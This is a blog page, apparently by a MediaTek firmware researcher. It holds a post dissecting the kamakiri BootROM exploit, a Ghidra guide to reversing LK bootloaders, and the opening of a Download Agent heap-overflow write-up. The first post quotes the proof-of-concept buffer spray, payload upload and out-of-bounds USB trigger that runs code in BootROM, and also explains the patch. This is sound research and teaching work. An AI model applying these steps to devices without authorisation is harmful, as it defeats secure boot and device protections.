R0rt1z2

Dissecting a mantis - the kamakiri exploit

Sat, 02 May 2026 00:00:00 GMT

Introduction

I've known about the "kamakiri" 🦗 exploit for a while now, and like many others, I've even used it in practice, but I never really stopped to understand how it actually works under the hood.

There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn't much in the way of clear, detailed explanations of how they function internally.

Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it's the one I've used the most.

FWIW, this isn't the beginning of a full write-up series on all the MediaTek exploits. I'm just taking notes so I don't forget how any of this works later (future-me is notoriously unreliable lol).

Background

On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a Download Agent.

Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.

Since this has already been covered in the heapbait blog post, I won't go into detail here, but the three main mechanisms are Serial Link Authorization, Download Agent Authentication, and Secure Boot Control.

The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.

From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.

Origin

Before diving into the technical details, it's worth taking a step back to look at how and why this exploit came to be.

While it's unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when k4y0z and xyz` on XDA released a method to unlock the bootloader of the Fire TV Stick 4K.

At the time, the only known BROM exploit was amonet, which was already a few years old and had been patched on newer devices.

For those unfamiliar, "kamakiri" is the Japanese word for "mantis". The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is "mantis."

Source: u/Halakahiki on Reddit

It's also worth noting that there are two "variants" of this exploit, though in reality they're quite different under the hood.

The most commonly used one is the "v2" (kamakiri2) variant, which came later and is generally easier to work with. This post will focus on the original one.

USB Stack

To understand the exploit, you first need a rough picture of how the BROM's USB stack is organized. It's not complicated, but there are three specific pieces that matter:

The transmit buffer.
The echo protocol.
The interface handler table.

Each one is nothing special on its own; it's only when you look at them together that things get interesting.

The USB stack layers

Before getting into the buffers, it's worth understanding how the USB stack is organized, because it's a bit more layered than you might expect.

At the bottom there's the raw USB hardware: registers, FIFOs, endpoints. USB_EPFIFOWrite talks to this level directly, writing bytes into the hardware FIFO one at a time:

void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) {
    USB_INDEX = nEP;

    uint8_t *p = (uint8_t *)pSrc;
    uint8_t *fifo = (uint8_t *)(nEP * 4 + 0x11100020);

    while (nBytes--) {
        *fifo = *p++;
    }
}

Above that sits the ACM layer. USBDL_PutByte and its receive counterpart handle the staging buffers and know about packet boundaries:

void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) {
        USB_EPFIFOWrite(...);
        usbacm_tx_buf.len = 0;
    }
}

But there's another layer on top of all of this that's easy to miss. At some point during initialization, the BROM calls IO_Init, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:

void IO_Init(IO_INTERFACE vio) {
    if (vio == IO_USB) {
        IO_GetData  = (code *)0x5E99;  // USBDL_GetByte
        IO_PutData  = (code *)0x5EB3;  // USBDL_PutByte (wrapper)
        IO_TX_Flush = (code *)0x7321;  // USBDL_Flush
    } else if (vio == IO_UART) {
        IO_GetData  = (code *)0xD029;  // UART_adpt_GetData
        IO_PutData  = (code *)0xD043;  // UART_adpt_PutData
        IO_TX_Flush = (code *)0xD05D;  // UART_CheckSendComplete
    }
}

Whichever interface gets selected, the command handlers don't call USBDL_PutByte directly.

Instead they go through a small serialization layer (IO_PutData32_Ex, IO_PutData16_Ex, and IO_PutByte_Ex) that breaks values down into individual bytes and feeds them into IO_PutData one at a time:

void IO_PutData32_Ex(uint32_t data32, bool flush_tx) {
    for (int i = 0; i < 4; i++) {
        uint8_t byte = data32 >> (24 - i * 8);
        (*IO_PutData)(&byte, 1, 0xffffffff);
    }
    if (flush_tx)
        (*IO_TX_Flush)();
}
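To make the byte order concrete, here's a minimal Python sketch of the same loop. It isn't BROM code; put_data32 and the sent list are names made up for illustration. The point is that the shift by (24 - i * 8) emits the most significant byte first, which is the same as packing the value big-endian:

```python
import struct

def put_data32(value, sink):
    """Append the four bytes of a 32-bit value to sink, MSB first."""
    for i in range(4):
        sink.append((value >> (24 - i * 8)) & 0xFF)

sent = []
put_data32(0x12345678, sent)

# Same bytes as a big-endian pack of the value.
assert bytes(sent) == struct.pack(">I", 0x12345678)
print(bytes(sent).hex(" "))  # 12 34 56 78
```

So whatever 32-bit value a handler echoes, the bytes that pass through IO_PutData are in big-endian order.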

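This means none of the command handlers need to know which interface is active; they just call IO_PutData32_Ex and let the function pointer table sort it out. Over USB, the full path for an outgoing value looks like this: command handler -> IO_PutData32_Ex -> IO_PutData -> USBDL_PutByte -> USB_EPFIFOWrite -> hardware FIFO.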

The transmit buffer

When the BROM needs to communicate with the host, it doesn't read from or write to the USB hardware directly.

Instead, it stages data in RAM first. There's a receive buffer for incoming data and a transmit buffer for outgoing data.

For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.

The transmit buffer is a structure called usbacm_tx_buf, sitting at 0x001060E0 (for MT8167):

struct {
    uint32_t len;    // 0x001060E0 (how many bytes are currently queued)
    uint8_t  data[]; // 0x001060E4 (the actual bytes)
} usbacm_tx_buf;

len is the write cursor: it tracks how many bytes are currently sitting in data[] waiting to be sent.

Every outgoing byte goes through USBDL_PutByte, which appends it to data[] and bumps len:

void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS
        USB_EPFIFOWrite(txpipe->byEP, packet_size, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(txpipe->byEP);
        usbacm_tx_buf.len = 0;
    }
}

Once len hits the packet size, the buffer gets flushed to the hardware FIFO and len resets to zero. The bytes in data[] don't get cleared; they just sit there in RAM until something else writes over them.

There's also USBDL_Flush(), which sends whatever's currently queued without waiting for the buffer to fill up:

void USBDL_Flush(void) {
    if (nDevState == DEVSTATE_CONFIG && usbacm_tx_buf.len != 0) {
        nEP = txpipe->byEP;
        gUSBAcm_IsInEPComplete = false;
        USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(nEP);
        while (!gUSBAcm_IsInEPComplete)
            USB_HISR();
        usbacm_tx_buf.len = 0;
    }
}

Same result: len resets to zero, bytes stay in RAM. This "stale bytes" behavior is going to matter a lot later.
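The stale-bytes behavior is easy to reproduce in a toy model. The sketch below is plain Python, not BROM code: TxBuffer and its sent list are hypothetical, and it leaves out the device-state check and the wait for the transfer to complete. It only mirrors the cursor logic of USBDL_PutByte and USBDL_Flush:

```python
class TxBuffer:
    """Toy model of usbacm_tx_buf: a length cursor plus a data area."""

    def __init__(self, packet_size=64):
        self.packet_size = packet_size
        self.len = 0
        self.data = bytearray(packet_size)
        self.sent = []  # packets handed to the (imaginary) hardware FIFO

    def put_byte(self, value):
        self.data[self.len] = value
        self.len += 1
        if self.len == self.packet_size:
            self.flush()

    def flush(self):
        if self.len:
            self.sent.append(bytes(self.data[:self.len]))
            self.len = 0  # cursor resets, data[] is left untouched


tx = TxBuffer()
for b in b"\x00\x0a\x10\x00":
    tx.put_byte(b)
tx.flush()

print(tx.len, tx.data[:4].hex())  # 0 000a1000
```

After the flush the cursor is back at zero, but the four bytes are still sitting at the start of data[].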

BROM command loop

BROM doesn't always end up in the command loop; this only happens when it boots into USBDL mode. There are a few reasons this can happen.

The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that's simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.

Whatever the cause, once the BROM decides it's in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.

The loop reads a command byte and dispatches it to the appropriate handler:

void BromCmdLoop(void) {
    BromCmdLoop_Init();
    while (true) {
        uint8_t cmd = IO_GetByte();
        IO_PutByte_Ex(cmd, true); // echo cmd
        switch (cmd) {
        case 0xD1: BromCmd_Read(CMD_LEN_32, false);  break;
        case 0xD4: BromCmd_Write(CMD_LEN_32, true);  break;
        case 0xE0: BromCmd_SendCert();               break;
        case 0xFD: BromCmd_Get_HW_Code();            break;
        // ...
        }
    }
}

There are quite a few commands, but the ones relevant to this exploit are:

0xD1: BromCmd_Read: read arbitrary memory and echo it back
0xD4: BromCmd_Write: write arbitrary memory
0xE0: BromCmd_SendCert: load a blob into memory at a fixed address

Every one of these handlers echoes its arguments back before doing anything.

The interface handler table

When the BROM receives a USB control request on endpoint 0, it hands it off to USB_Endpoint0_Idle.

This function is responsible for parsing the request and dispatching it to the appropriate handler:

void USB_Endpoint0_Idle(void) {
    USB_EPFIFORead(0, 8, &cmd);

    if ((cmd.bmRequestType & USB_CMD_TYPEMASK) == 0) {
        // standard requests
        switch (cmd.bRequest) {
        case 0x05: stall = USB_Cmd_SetAddress(&ep0info, &cmd);    break;
        case 0x06: stall = USB_Cmd_GetDescriptor(&ep0info, &cmd); break;
        case 0x09: stall = USB_Cmd_SetConfiguration(&ep0info, &cmd); break;
        case 0x0b: stall = USB_Cmd_SetInterface(&ep0info, &cmd);  break;
        // ...
        }
        return;
    }

    // class specific requests
    if ((cmd.bmRequestType & 0x60) != 0x20) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if ((cmd.bmRequestType != 0xA1) && (cmd.bmRequestType != 0x21)) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
        (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
        return;
    }

    USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
}

Standard requests like SetAddress or GetDescriptor are handled inline, whereas class specific requests (identified by bmRequestType having the class bit set) get dispatched through a different path.

For those, the BROM looks up the handler in if_info, a table of interface descriptors sitting at 0x00103780.

Each entry is 0x34 bytes and contains, among other things, a function pointer at offset +0x04:

struct Usb_Interface_Info {
    char     *interface_name;          // +0x00
    void     *if_class_specific_hdlr;  // +0x04 (function pointer)
    uint16_t  ifdscr_size;             // +0x08
    // ...
};

When a class specific request comes in, the BROM takes cmd.wIndex, uses it as an index into if_info, and calls the handler directly:

(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

There are only three registered interfaces, but nothing stops you from requesting wIndex=200, or wIndex=204, or any other value that lands outside the legitimate interface entries.
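To get a feel for where those out-of-range indices point, here's a small Python sketch that computes the address the BROM would read the handler pointer from. The constants are the MT8167 values quoted in this post; the helper names and the idea of scanning a "window" of data[] are only for illustration:

```python
IF_INFO_BASE = 0x00103780   # if_info table (MT8167)
ENTRY_SIZE = 0x34           # size of one Usb_Interface_Info entry
HDLR_OFFSET = 0x04          # if_class_specific_hdlr within an entry
TX_DATA = 0x001060E4        # usbacm_tx_buf.data
REGISTERED = 3              # number of real interfaces

def hdlr_slot(windex):
    """Address the handler pointer is read from for this wIndex."""
    index = windex & 0xFF  # the (byte) cast in USB_Endpoint0_Idle
    return IF_INFO_BASE + index * ENTRY_SIZE + HDLR_OFFSET

def slots_inside_tx_data(window):
    """wIndex values whose 4-byte slot lies in the first `window` bytes of data[]."""
    return [i for i in range(REGISTERED, 256)
            if TX_DATA <= hdlr_slot(i) and hdlr_slot(i) + 4 <= TX_DATA + window]

print(hex(hdlr_slot(2)))         # 0x1037ec, last legitimate entry
print(hex(hdlr_slot(204)))       # 0x1060f4, far outside the table
print(slots_inside_tx_data(64))  # [204]
```

With these numbers, wIndex=204 is the first index whose handler slot falls inside usbacm_tx_buf.data[], and the only one within the first 64 bytes.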

Walking through the PoC

Now that we have a somewhat solid understanding of the USB stack, let's walk through the exploit step by step.

The PoC we'll be looking at can be found here and there are probably other versions floating around, but they all do the same thing in the end.

Handshake and setup

dev.handshake()
dev.write32(0x10007000, 0x22000000)

Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four byte sequence.

BROM expects A0 0A 50 05 and responds with the bitwise complement of each byte. Once that's done, it is ready to accept commands.
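As a quick sanity check, the expected replies can be computed on the host. This is just a sketch; expected_reply is a hypothetical helper, not something from the PoC:

```python
HANDSHAKE = bytes([0xA0, 0x0A, 0x50, 0x05])

def expected_reply(sent):
    """Bitwise complement of each byte, truncated to 8 bits."""
    return bytes(~b & 0xFF for b in sent)

print(expected_reply(HANDSHAKE).hex(" "))  # 5f f5 af fa
```

A host implementation would compare each byte it reads back against this sequence before moving on.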

If the device was forced into USBDL mode by shorting the eMMC, the user also needs to release the short at this point before continuing.

The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:

thread = UserInputThread()
thread.start()
while not thread.done:
    dev.write32(0x10007008, 0x1971)  # kick watchdog
    time.sleep(1)

Once the short is released and the thread signals done, execution continues with the rest of the exploit.

The TX buffer spray

The next thing the PoC does is manipulate the TX buffer:

addr = 0x10007050
dev.write32(addr, [0xA1000])
cnt = 15
for i in range(cnt):
    dev.read32(addr - (cnt - i) * 4, cnt - i + 1)

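The goal is to get the bytes 00 0A 10 00 to land at a specific offset inside usbacm_tx_buf, the one that corresponds to if_info[wIndex].if_class_specific_hdlr for the wIndex we plan to use in the trigger step. That is how the BROM echoes 0x000A1000 (most significant byte first), and read back as a little-endian word it becomes 0x00100A00, the payload address.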

WDT_BASE + 0x50 is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.

What the register itself does doesn't really matter; what matters is that it's accessible without triggering any access violations.

write32(addr, [0xA1000]) plants 0x000A1000 there. From that point, the loop issues a series of reads with increasing starting addresses and decreasing sizes, all ending at addr.

Each iteration starts one word later than the last and reads one word fewer:

i=0:  read32(addr - 60, 16)
i=1:  read32(addr - 56, 15)
...
i=14: read32(addr - 4,  2) (last word read is at addr, which holds 0x000A1000)
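The full list of reads can be generated from the loop parameters. The sketch below only reproduces the arithmetic of the PoC loop (spray_reads is a hypothetical helper and nothing is sent to a device), and checks that every read ends on the planted word:

```python
ADDR = 0x10007050  # scratch word holding 0x000A1000
CNT = 15

def spray_reads(addr=ADDR, cnt=CNT):
    """(start address, word count) for each read32 issued by the loop."""
    return [(addr - (cnt - i) * 4, cnt - i + 1) for i in range(cnt)]

for start, words in spray_reads():
    last_word = start + (words - 1) * 4
    assert last_word == ADDR  # every read ends on the planted word
    print(f"read32({start:#010x}, {words})")
```

The first line printed is read32(0x10007014, 16) and the last is read32(0x1000704c, 2).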

Every one of those reads echoes its data back through USBDL_PutByte, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.

Either way, the end result is the same: 0x000A1000 ends up sitting at the right offset inside usbacm_tx_buf to overlap with if_info[wIndex].if_class_specific_hdlr.

Loading the payload

For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, BromCmd_SendCert (0xE0) does exactly that.

It was probably designed to receive a certificate blob from the host and load it into memory at 0x100A00 for verification.

def attempt2(d):
    d.write(b"\xE0")
    result = d.read(1)
    d.write(p32(0xA00))
    result = d.read(4)
    payload = load_payload_file("../brom-payload/stage1/stage1.bin")
    d.write(payload)

The host sends 0xA00 as the length, the BROM echoes it back, then reads that many bytes into 0x100A00. On the BROM side:

uint32_t BromCmd_SendCert(void) {
    uint32_t len = IO_GetData32();
    IO_PutData32_Ex(len, true);

    if (!bExecOnce) {
        bExecOnce = true;
        if (Secure_SCTRL_CERT_IsValidRange(len) < 0xff) {
            IO_PutData16_Ex(status, true);
            IO_GetDataBlock8(0x100A00, len, 5);  // payload lands here
            Secure_SCTRL_CERT_Verify(0x100A00);  // fails, but doesn't clean up
        }
    }

    IO_PutData16_Ex(status, true);
    return status;
}

The detail here is that the data gets written to memory before verification runs. The cert check will fail since we're not sending anything valid, but BROM never cleans up the memory afterwards.
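The write-then-verify ordering can be modelled in a few lines of Python. This is a sketch under assumptions: send_cert, verify and the wipe_on_failure flag are hypothetical stand-ins, RAM is just a bytearray, and the verifier rejects everything the way it would for an unsigned payload:

```python
CERT_ADDR = 0x100A00
MAX_LEN = 0xA00  # size limit as described in this post

def verify(blob):
    """Stand-in for Secure_SCTRL_CERT_Verify: reject everything."""
    return False

def send_cert(ram, blob, wipe_on_failure=False):
    """Copy blob to CERT_ADDR, then verify it. Returns True if accepted."""
    if len(blob) > MAX_LEN:
        return False
    ram[CERT_ADDR:CERT_ADDR + len(blob)] = blob  # written before any check
    ok = verify(blob)
    if not ok and wipe_on_failure:
        ram[CERT_ADDR:CERT_ADDR + len(blob)] = bytes(len(blob))
    return ok

ram = bytearray(CERT_ADDR + MAX_LEN)
payload = b"\xde\xad\xbe\xef"
accepted = send_cert(ram, payload)
print(accepted, ram[CERT_ADDR:CERT_ADDR + 4].hex())  # False deadbeef
```

The blob is rejected, yet it's still in memory. Passing wipe_on_failure=True shows what a cleanup step would change.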

The only real constraint is size: the payload must fit within 0xA00 bytes, which is solved by using a two-stage approach.

Pulling the trigger

At this point the two pieces are in place: the payload is sitting at 0x100A00 and usbacm_tx_buf has been sprayed with 0x000A1000 at the right offset. All that's left is to trigger the jump.

To confirm this, here's a hexdump of usbacm_tx_buf taken from inside the stage1 payload immediately after it starts running:

001060E0  00 00 00 00 A1 A2 A3 A4  00 0A 10 00 00 0A 10 00  |................|
001060F0  00 0A 10 00 00 0A 10 00  00 0A 10 00 00 0A 10 00  |................|

len is zero (the buffer was flushed), and the bytes of 0x000A1000 (00 0A 10 00) repeat throughout data[]. The copy at &data[16] = 0x1060F4 is the one that matters; that's where if_info[204].if_class_specific_hdlr lives:

>>> hex(0x00103780 + 204 * 0x34 + 4)
'0x1060f4'

0x00103780 is the base address of if_info, 0x34 is the size of each entry, 204 is the index, and +4 is the offset of if_class_specific_hdlr within the entry.

The result lands exactly at 0x1060F4, inside usbacm_tx_buf.data[]. The trigger is a USB control request:

try:
    udev.ctrl_transfer(0xA1, 0, 0, 204, 0)
except usb.core.USBError as e:
    print(e)

0xA1 is bmRequestType with the direction bit (0x80) and the class bit (0x20) set, plus the interface recipient (0x01). This translates to a class-specific request, addressed to an interface, with data flowing from device to host.
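For reference, here's a small Python decoder for the bmRequestType bit fields as laid out in the USB 2.0 specification. The function name is made up; the field layout (bit 7 direction, bits 6..5 type, bits 4..0 recipient) is standard:

```python
def decode_bm_request_type(value):
    """Split bmRequestType into its three USB 2.0 fields."""
    direction = "device-to-host" if value & 0x80 else "host-to-device"
    req_type = ["standard", "class", "vendor", "reserved"][(value >> 5) & 0x3]
    names = {0: "device", 1: "interface", 2: "endpoint", 3: "other"}
    recipient = names.get(value & 0x1F, "reserved")
    return direction, req_type, recipient

print(decode_bm_request_type(0xA1))
# ('device-to-host', 'class', 'interface')
```

0x21 decodes the same way except for the direction, which matches the two values USB_Endpoint0_Idle accepts before it looks up the handler.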

wIndex=204 is what gets used to index into if_info. USB_Endpoint0_Idle receives the request and does:

(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);

if_info[204].if_class_specific_hdlr holds the bytes 00 0A 10 00 (put there by the spray), which the CPU loads as the little-endian pointer 0x00100A00, so execution jumps straight to the payload at 0x100A00.
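The byte-order step is easy to check with struct. This sketch assumes what the hexdump and the serialization code suggest: the BROM echoes 32-bit values most significant byte first, and the CPU reads the handler slot as a little-endian word:

```python
import struct

planted = 0x000A1000                      # value written to the scratch word
echoed = struct.pack(">I", planted)       # bytes as they land in the TX buffer
pointer = struct.unpack("<I", echoed)[0]  # same bytes loaded as a pointer

print(echoed.hex(" "), hex(pointer))  # 00 0a 10 00 0x100a00
```

That's why the PoC writes 0xA1000 rather than 0x100A00: the echo swaps the byte order on the way into the buffer.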

The stage1 payload confirms it's running by sending back 0xA1A2A3A4:

data = d.read(4)
if data != b"\xA1\xA2\xA3\xA4":
    raise RuntimeError("...")

If that comes back, the exploit succeeded and the payload is running.

Fixes

The vulnerability was patched at some point. The first chip where it was publicly identified as fixed is the MT6853, seen in 2021, but it may have been patched earlier on other chips.

The fix itself is straightforward: a simple bounds check on wIndex before the handler dispatch:

// vulnerable
if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&ep0info, &cmd);
    return;
}

// fixed
if (((byte)cmd.wIndex < 3) &&
    (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) {
    (*handler)();
    return;
}

There are only three registered interfaces, so any wIndex >= 3 now gets rejected outright. The OOB access into if_info is no longer possible.

On the BromCmd_SendCert side, the patched BROM also zeroes out the memory at 0x100A00 if verification fails:

if (verify_failed) {
    memset(0x100A00, 0, len);  // clean up on failure
}

So even if the jump could somehow be triggered, there'd be nothing useful at 0x100A00 to land on.

Conclusion

Seven years. That's how long it took me to actually sit down and understand an exploit I've been using since forever. Better late than never I guess.

And honestly, now that I understand how it works, I'm surprised at how "simple" it actually is, at least compared to a lot of the other exploits that I've looked at.

I wasn't even planning to make this a whole post, this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.

How to Reverse Engineer MediaTek Bootloaders

Mon, 30 Mar 2026 00:00:00 GMT

Introduction

I've been working on a lot of projects involving MediaTek bootloaders lately, and they've been getting more attention over time.

Because of that, I thought it would make sense to put together a proper guide on how to reverse engineer MediaTek LKs, while keeping it as beginner friendly as possible and adding some visuals along the way.

I've written a few guides on this topic before, but I've improved quite a bit since then and started using some new techniques that make the process easier.

So instead of leaving everything scattered, this guide brings it all together in one place (or tries to, at least).

Requirements

This guide assumes you have a computer and at least some basic common sense. Other than that, you'll need:

Install everything from the official sources linked above, and make sure your Java environment is set up correctly for Ghidra.

I'm not going to cover installation here since it's straightforward, and you can always look it up if needed.

Background

MediaTek uses a bootloader called LK (Little Kernel) on most of its Android devices, although some platforms may use alternatives like u-boot.

LK typically acts as the third-stage bootloader and runs in S-EL1 (Secure EL1) on ARMv8 devices, and in PL1 (Supervisor mode) on ARMv7 devices. If we follow ARM naming conventions, this would be BL33.

There are two main variants of LK:

Legacy LK (v1.0): Found on older devices. These are typically paired with V3 (legacy) or V5 (XFLASH) DA protocols. LK runs in ARMv7 mode, even on SoCs that support ARMv8.
Modern LK (v2.0): Used on newer devices, typically paired with the V6 (XML) DA protocol. It runs in ARMv8 mode with the MMU enabled, inside a virtual memory space.

The LK image you find on a MediaTek device is packed and contains multiple sub-partitions. The exact number depends mostly on the LK variant.

Legacy LK usually includes lk and lk_main_dtb, while modern LK includes lk, bl2_ext, aee, lk_main_dtb, and lk_dtbo.

Each partition has its own header defining size and other runtime parameters, and in most cases also includes two associated certificates (cert1 and cert2) used for verification as part of the secure boot chain.

This is pretty obvious (and, in my opinion, a bit stupid), but some people still get confused: the file extension does not really matter.

You can list the sub-partitions in your image using lkpatcher:

$ python3 -m lkpatcher pacman.bin --list-partitions
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from pacman.bin with 5 partitions (version 2)

Partitions in bootloader image:
----------------------------------------
1. lk (927248 bytes)
2. bl2_ext (659112 bytes)
3. aee (885416 bytes)
4. lk_main_dtb (289015 bytes)
5. lk_dtbo (164385 bytes)
----------------------------------------

Instructions

Depending on the image you have, the exact steps may vary, but the general process is similar.

Extracting the actual LK binary

Start by extracting the actual lk sub-partition from the image. You can do this with lkpatcher:

$ python3 -m lkpatcher lk.bin -d lk
[INFO] MediaTek bootloader (LK) patcher - version: 4.0.3 by R0rt1z2
[INFO] Successfully loaded 6 patches in 4 categories
[INFO] Loaded image from lk.bin with 2 partitions (version 1)
========================================
Partition Name  : lk
Data Size       : 1246148 bytes
Addressing Mode : 0xffffffff
Memory Address  : 0x4c400000
========================================
[INFO] Successfully dumped partition lk to lk_lk.bin

This will give you a file called lk_lk.bin, which is the actual LK binary we want to reverse engineer.

Make sure to note down the Memory Address from the output, as this is the base address where the binary is loaded in memory. This will be important later during analysis.

Also note down the version of the LK (v1.0 or v2.0) as this determines the architecture and some of the techniques we'll use later on.

For version 2 (modern) LKs, you might see a very large memory address (e.g. 0xffff000050f00000). That's a virtual address, since modern LK runs with the MMU enabled, and it's completely normal.

Loading the Binary in Ghidra

If you haven't already, create a new Ghidra project. Give it a name and choose where to store it.

Drag and drop the lk_lk.bin file into the project window. This will open the "Import File" dialog.

The only thing we need to configure here is the Language option. Everything else can stay as is.

Click the three dots next to the Language field to open the "Select Language" dialog. From here, choose the correct architecture for your binary:

If you're working with a legacy LK (v1.0), select ARM:LE:32:v7:default, as it runs in ARMv7 mode.
If you're working with a modern LK (v2.0), select AARCH64:LE:64:v8A:default, as it runs in ARMv8 mode.

[Screenshots: ARMv7 (Legacy LK) | ARMv8 (Modern LK)]

If selected correctly, it'll look like this (the Language will differ if you're dealing with a modern LK):

Simply click OK and wait for the file to be imported into the project.

Analyzing the Binary

After importing the file, it will appear in your project view. Double click it to open it in the CodeBrowser.

You'll be prompted to run auto-analysis. It is important that you choose No here, as we still need to configure a few things first. Running it now will only cause confusion and make things harder.

Since we chose not to run auto-analysis, go to the top menu bar and locate the icon that looks like a RAM stick. Click it to open the Memory Map window.

In the Memory Map, select the "ram" section and disable the "W" (write) permission, which is enabled by default. Only "R" (read) and "X" (execute) should remain enabled.

In the same window, locate the house icon, which opens the "Image Base Address" dialog.

Click it and set the base address to the Memory Address you noted earlier when extracting the binary with lkpatcher (e.g. 0x4c400000 or 0xffff000050f00000).

Click the Save icon in the top left corner to apply the changes, then close the Memory Map window and return to the CodeBrowser.

In the CodeBrowser, go to the top menu bar and click Edit > Tool Options to open the Tool Options dialog.

Search for "Unreachable", then go to Decompiler > Analysis and disable the "Eliminate Unreachable Code" option (enabled by default). Click Apply, then OK to save.

Finally, trigger auto-analysis by pressing A in the main CodeBrowser window. In the dialog that appears, leave everything as is and click OK.

If everything was done correctly, once the analysis finishes:

For legacy LKs (v1.0), in the listing (ASM) view you should see a vector table, and in the Decompiler view you should see an unnamed function that sets up the stack, BSS, and other sections.
For modern (v2.0) LKs, you won't see a vector table, but you should still see the unnamed function that sets up the stack, BSS, and other sections.

[Screenshots: Legacy LK (v1.0) | Modern LK (v2.0)]

That should be it. This guide was meant to be concise, so there’s not much more to explain here. You should now have an easier time understanding what certain functions do and how the bootloader works.

ARMv8 Bonus: Ghidra Script

If you're working with ARMv8 (modern) LKs, I have a Ghidra script that can speed things up quite a bit.

It automatically resolves and renames a number of commonly used functions (like lk_main, dprintf, fastboot_*, init functions, etc.), and also defines some basic structs and enums to make the decompilation output cleaner.

You can use it by doing the following:

Add the script to your Ghidra scripts directory (via Script Manager -> Script Directories).
Load and analyze your LK binary as shown above.
Run the script from the Script Manager.

More details and the script are available in my GitHub repository.

Exploiting MediaTek's Download Agent

Fri, 30 Jan 2026 00:00:00 GMT

Introduction

In September 2025, Chimera quietly announced "world-first" support for MediaTek's latest Dimensity 9400 and 8400 SoCs running DAs compiled months after MediaTek had patched Carbonara.

So we figured they'd either found a way around the patches, or they were sitting on something entirely new. We had to find out.

Shortly after shomy opened a PR adding Carbonara support to MTKClient, someone left a comment with a USB capture of Chimera and a note:

So we did.

What followed was months of USB packet captures, late-night reversing sessions, and way too many crashes and reboots, all done together with shomy!

What we eventually found was heapb8 (/ˈhiːpbeɪt/, "heap-bait"), a heap overflow in DA2's USB file download handler that allows arbitrary code execution on V6 devices patched against Carbonara.

In this post, we'll walk through how we went from noticing Chimera's suspicious update to achieving code execution on modern MediaTek SoCs.

It's a long and fairly technical write-up, so take a seat. I've tried to keep it readable, but it's still a deep dive.

Background

MediaTek devices have two different USB download modes exposed by different boot stages: BootROM and Preloader.

For the past few years, tools like MTKClient have been exploiting vulnerabilities in the BootROM's USB stack to gain code execution.

However, MediaTek patched most of these vulnerabilities in newer SoCs, and to make matters worse, a lot of OEMs opted to disable BootROM USBDL entirely on their devices, leaving Preloader USBDL as the only option.

Download Agents

Since this writeup focuses on DA2 exploitation, let's briefly cover how MediaTek's Download Agents work.

To interact with the device in either of these modes, MediaTek uses Download Agents (DAs). DAs are small programs that run on the device and handle USB communication, flashing, and other low-level operations.

Each DA is built for a specific chipset (identified by its hardware code), though some DA files like MTK_AllInOne_DA.bin bundle multiple chipsets into a single binary.

There are three main DA protocol versions:

Legacy (V3): Codename himalaya. Found on older devices (MT65XX series).
XFlash (V5): Codename raphael. Found on devices released between 2016 and ~2022.
XML (V6): Codename chimaera. Found on modern devices, mainly Dimensity and newer Helio chips.

heapb8 targets the XML (V6) DA protocol, so that's what we'll focus on.

Structure

The DA file starts with a 0x6C byte header containing the magic string MTK_DOWNLOAD_AGENT (or MTK_DA_v6 for V6), a version number, and the number of supported SoCs.

Following the header is an array of DA entries, one per chipset. Each entry contains the hardware code, sub-code, and a list of regions:

Region 0: Loader/stub (small bootstrap code)
Region 1: DA1
Region 2: DA2

Each region has an offset, length, load address, and signature length. The signature (if present) is appended at the end of the region data.
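As a rough illustration, the header can be unpacked with struct. Big caveat: the post only states the header size and what it contains, so the exact field layout below (a 32-byte magic string, a 64-byte identifier, then three little-endian u32 fields for version, an unnamed magic number, and the entry count) is an assumption that happens to add up to 0x6C. Check it against a real DA before relying on it. The test header is synthetic:

```python
import struct

HEADER_SIZE = 0x6C
# Assumed layout: 32-byte magic string, 64-byte identifier, then three
# little-endian u32 fields (version, magic number, entry count).
HEADER = struct.Struct("<32s64sIII")
assert HEADER.size == HEADER_SIZE

def parse_da_header(blob):
    """Parse the assumed DA file header into a dict."""
    magic, ident, version, _number, count = HEADER.unpack_from(blob, 0)
    return {
        "magic": magic.rstrip(b"\x00").decode("ascii"),
        "id": ident.rstrip(b"\x00").decode("ascii"),
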